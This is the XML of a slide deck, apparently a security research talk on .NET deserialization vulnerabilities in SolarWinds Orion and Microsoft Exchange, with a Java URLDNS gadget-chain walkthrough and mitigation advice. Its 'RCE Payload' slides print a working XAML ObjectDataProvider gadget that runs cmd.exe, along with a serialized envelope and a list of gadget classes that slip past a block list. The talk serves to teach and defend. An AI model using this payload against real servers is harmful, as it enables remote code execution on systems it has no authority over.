              <a:t>PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>m_data = “System.Windows.Markup.XamlReader”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>GetTargetTypeForDeserialization() will return XamlReader type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1533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F96-EA7D-98C8-7812-5FE4F6D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RCE Payload – FigureParseConversion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6E0A-7D60-90CF-3529-7B746988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084"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>System.Windows.Markup.XamlReader.Parse() is called with an attacker-controlled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FE1FE-BF7C-4E11-217F-46D3F3B889F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671945" y="2829646"/>
            <a:ext cx="100722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&lt;ResourceDictionary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"http://schemas.microsoft.com/winfx/2006/xaml/presentation"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xmlns:Diag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"clr-namespace:System.Diagnostics;assembly=system"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xmlns:System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"clr-namespace:System;assembly=mscorlib"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"http://schemas.microsoft.com/winfx/2006/xaml"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&lt;ObjectDataProvider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x:Key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"LaunchCalch"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ObjectType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"{x:Type Diag:Process}"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MethodName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&lt;ObjectDataProvider.MethodParameters&gt;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&lt;System:String&gt;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cmd.exe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&lt;/System:String&gt;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&lt;System:String&gt;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 whoami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&amp;gt;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C:\\poc.txt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&lt;/System:String&gt;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&lt;/ObjectDataProvider.MethodParameters&gt;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&lt;/ObjectDataProvider&gt;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&lt;/ResourceDictionary&gt;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912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9F96-EA7D-98C8-7812-5FE4F6D3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RCE Payload – Final Payload</a:t>
            </a:r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B9052-8EB8-3235-DCF8-F38A5F37DB5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333829" y="1324816"/>
            <a:ext cx="1094377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"Args"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&lt;TNRef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&lt;LST&gt;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"13"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-Identity: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&lt;!--Object type section--&gt;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System.ServiceProcess.ServiceController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System.Object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&lt;/TN&gt;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&lt;ToString&gt;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&lt;/ToString&gt;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&lt;!--Object type section end--&gt;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&lt;!--Properties section--&gt;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&lt;Props&gt;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&lt;Obj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TargetTypeForDeserialization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CA" sz="8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System.Exception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System.Object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&lt;/TN&gt;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&lt;BA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"SerializationData"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AEAAAD/////AQAAAAAAAAAEAQAAAB9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAREYXRhCVVuaXR5VHlwZQxBc3NlbWJseU5hbWUBAAEIBgIAAAAgU3lzdGVtLldpbmRvd3MuTWFya3VwLlhhbWxSZWFkZXIEAAAABgMAAABYUHJlc2VudGF0aW9uRnJhbWV3b3JrLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQs=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&lt;/BA&gt;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&lt;/Props&gt;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&lt;!--Properties section end--&gt;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&lt;!--Payload section--&gt;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&lt;![CDATA[&lt;ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:System="clr-namespace:System;assembly=mscorlib" xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system"&gt;&lt;ObjectDataProvider x:Key="LaunchCalch" ObjectType="{x:Type Diag:Process}" MethodName="Start"&gt;&lt;ObjectDataProvider.MethodParameters&gt;&lt;System:String&gt;cmd.exe&lt;/System:String&gt;&lt;System:String&gt;/c whoami &gt; C:\\poc.txt&lt;/System:String&gt; &lt;/ObjectDataProvider.MethodParameters&gt; &lt;/ObjectDataProvider&gt; &lt;/ResourceDictionary&gt;]]&gt;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&lt;!--Payload section end--&gt;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&lt;/MS&gt;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&lt;/LST&gt;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8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&lt;/Obj&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="8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7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CVE-2022-41082 -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2225-DD71-5607-F5D7-C6FB5072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Allowed types allows to deserialize an arbitrary object of type Type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Allows an arbitrary type to be called in type conversion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Leads to call to Parse() method of an arbitrary type with attacker-controlled data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73314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4DC-7467-77FF-ABF1-07AFDFE9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How to NOT get Pwned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981F-9B8E-5FE0-55B1-62F3191C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Don’t use deserialization if not needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>Only use safe serialization formatters with secure configurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>Create a strict allow list of types expected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>Do not rely on disallowed types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41365645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6853-6759-3926-4345-6CA4C1B3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C2F6-A30A-AA7B-DCAB-CF6A62B0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CVE-2021-31474 Writeup</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>CVE-2021-35215 Writeup</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>CVE-2021-42321 Writeup</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>CVE-2022–21969 Writeup</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>CVE-2022-23277 Writeup</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>CVE-2022-41082 Writeup</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Friday the 13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="30000">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> JSON Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>ysoserial.net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6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933F3-97F8-E1FC-6650-67D753837393}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798955" y="1514844"/>
            <a:ext cx="757977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getHostAddress:436, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>URLStreamHandler</a:t>
            </a:r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 (java.net)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1600">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hashCode:361, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>URLStreamHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (java.net)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1600">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hashCode:1000, URL (java.net)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1600">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hash:340, HashMap (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java.util</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600"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readObject:1467, HashMap (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java.util</a:t>
            </a:r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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>invoke0:-1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NativeMethodAccessorImpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jdk.internal.reflect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600"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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>invoke:62, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NativeMethodAccessorImpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jdk.internal.reflect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600"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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>invoke:43, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DelegatingMethodAccessorImpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jdk.internal.reflect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600"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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>invoke:566, Method (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java.lang.reflect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1600">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>invokeReadObject:1046, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ObjectStreamClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600"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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>readSerialData:2357, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ObjectInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600"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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>readOrdinaryObject:2228, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ObjectInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600"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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>readObject0:1687, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ObjectInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600"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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>readObject:489, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ObjectInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600"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readObject:447, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ObjectInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (java.io)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1600">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>main:11, Main</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38069744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C624-2C4C-E51E-8FC1-038D2CDC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Thanks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4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1DE9AAD9-A040-51DF-830E-93C6764C7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40183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 – HashMap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AD88-5CED-063D-DC71-1C27FE55A6F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372824" y="1754580"/>
            <a:ext cx="1124358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s) throws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ClassNotFoundException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mappings; ++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putVal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(key), key, value,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InvalidObjectException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"Illegal load factor: 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8259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 – HashMap Class</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp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52D45CF-CE97-B0BB-64BB-7585CF4D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2282031"/>
            <a:ext cx="10306050" cy="3438525"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268184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– URLDNS – HashMap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AD88-5CED-063D-DC71-1C27FE55A6F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580821" y="1782395"/>
            <a:ext cx="72563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 =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^ h &gt;&gt;&gt;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1553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– URLDNS – URL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AD88-5CED-063D-DC71-1C27FE55A6F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580821" y="1782395"/>
            <a:ext cx="72563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-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4534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– URLDNS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>URLStreamHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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AD88-5CED-063D-DC71-1C27FE55A6F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580821" y="1782395"/>
            <a:ext cx="72563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getProtocol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(protocol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h +=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getHostAddress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(u);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 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</p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368913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8CE9-C966-8DFA-9AC6-53A55E8F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– URLDNS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>URLStreamHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Class</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/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270355-4989-0A03-1DBB-F04A1C972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00" y="2655025"/>
            <a:ext cx="6801200" cy="2692538"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317410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451B-20AC-1E5C-6CD7-38E3748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85392"/>
            <a:ext cx="10515600" cy="2852737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SolarWinds Orion Platform</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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A5F90C-CF6C-DA31-DB00-D8A9EB424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4249262"/>
            <a:ext cx="4745759" cy="10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9755-D813-996D-114C-2F93D8E2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&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>whoami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0D1A-BCC4-FCD2-FC97-3D4FA57F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Vulnerability Researcher @ Trend Micro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Research N-Day vulnerabilities in popular enterprise products</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Provide detection guidance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Previously</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Security Consultant / Penetration Tester</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Computer Programmer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Education</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>B.Sc in Computer Engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OSCP &amp; other certs…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623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CVE-2021-31474 | ZDI-21-602</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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A4FD8C44-C685-0D4B-2647-EF3824715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17" y="1690688"/>
            <a:ext cx="441760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A4C33E-AB2D-4EFE-AC20-A221136EF26F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5902036" y="567269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Meme credit to Nguyễn Tiến Giang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2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CVE-2021-31474 | ZDI-21-602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A4B-B3BD-0845-020E-EC87F5E2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 err="1"/>
              <a:t>SolarWinds.Serialization.Json.SerializationHelper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>Uses Json.NET for deserialization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Discovered by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>Piotr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" err="1"/>
              <a:t>Bazydło</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t> from the Zero Day Initiative</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>Patched in March 2021</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3443236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F11-A41E-1012-A001-EB3CD0C9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Deserialization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2846-360D-E969-9627-7B1C16E2F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2775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Verification of expected type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>TypeNameHandling setting allows to configure whether type names are included</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SerializationBinders can be included</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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62654F1-CDA7-D416-5FDB-627CADA8B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9715"/>
            <a:ext cx="9951550" cy="154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39B6-69D2-B194-F576-C60BC81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SerializationBinder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4A91-7421-9247-30AB-B5DFFE5DA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68345" cy="166572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Attempt to mitigate risks of dangerous serialization formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Allows to control class loading and mandate what class to load</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Implementations must override BindToType(), which controls binding of a serialized object to a type</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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47D2666-FC6B-CC1C-B06E-C12DB88A79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3570625"/>
            <a:ext cx="8326582" cy="2519570"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1892665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2020.2.4 – ActionControllerImplementation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836E5-8281-E48F-59B3-3355238ACBB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246743" y="1690688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TestAction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requestJObject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ActionControllerImplementation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.&lt;&gt;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o__6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.&lt;&gt;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p__10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ActionControllerImplementation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.&lt;&gt;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o__6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.&lt;&gt;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p__10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CallSite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CallSite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ActionControllerImplementation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InvokeMember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CSharpBinderFlags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InvokeSimpleName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"DeserializeObjectWithTypes"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ActionContextBase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ActionControllerImplementation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CSharpArgumentInfo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CSharpArgumentInfo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CSharpArgumentInfoFlags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UseCompileTimeType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CSharpArgumentInfo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CSharpArgumentInfoFlags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224781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2020.2.4 – ActionControllerImplementation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7CCB3-75B4-7437-ECD7-0DFEBDE30BFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602343" y="2102400"/>
            <a:ext cx="89117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DeserializeObjectWithTypes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TypeNameHandling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TypeNameHandling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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Objects</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" b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SerializationHelper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80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2020.2.4 – ActionControllerImplementation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1B4F6-C129-1BBE-9BA6-3D0FE0F7D6D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573314" y="2356400"/>
            <a:ext cx="10871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SerializationHelper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ApplyDeserializationBlacklist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SerializationHelper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FromJsonInternal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FromJsonInternal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JsonConvert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161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2020.2.4 – BlackListBinder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E5A7F-6BA8-A88E-4427-D269C3B134B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341085" y="1989860"/>
            <a:ext cx="116767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BlackListSet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"System.Activities.Presentation.WorkflowDesigner"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"System.Windows.ResourceDictionary"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"System.Windows.Data.ObjectDataProvider"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"System.Windows.Forms.BindingSource"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"Microsoft.Exchange.Management.SystemManager.WinForms.ExchangeSettingsProvider"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"System.Management.Automation.PSObject"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"System.Configuration.Install.AssemblyInstaller"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"System.Security.Principal.WindowsIdentity"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"System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector"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"System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector+ObjectSurrogate+ObjectSerializedRef"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2146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2020.2.4 – BlackListBinder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043E-2805-2816-34ED-DCAA2E4F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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Missing known deserialization gadget classes from ysoserial.net:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>System.IdentityModel.Tokens.SessionSecurityToken</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>System.Web.Security.RolePrincipal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>System.Web.UI.MobileControls.SessionViewState+SessionViewStateHistoryItem</a:t>
            </a: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61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3627-90BB-5A46-995D-DE68CEF4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to Exploitation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CC9D-006F-F0A9-B3C4-04747083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Json deserializer is using type names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We know there are known gadgets to use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>However, expected type is still checked (ActionContextBase)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
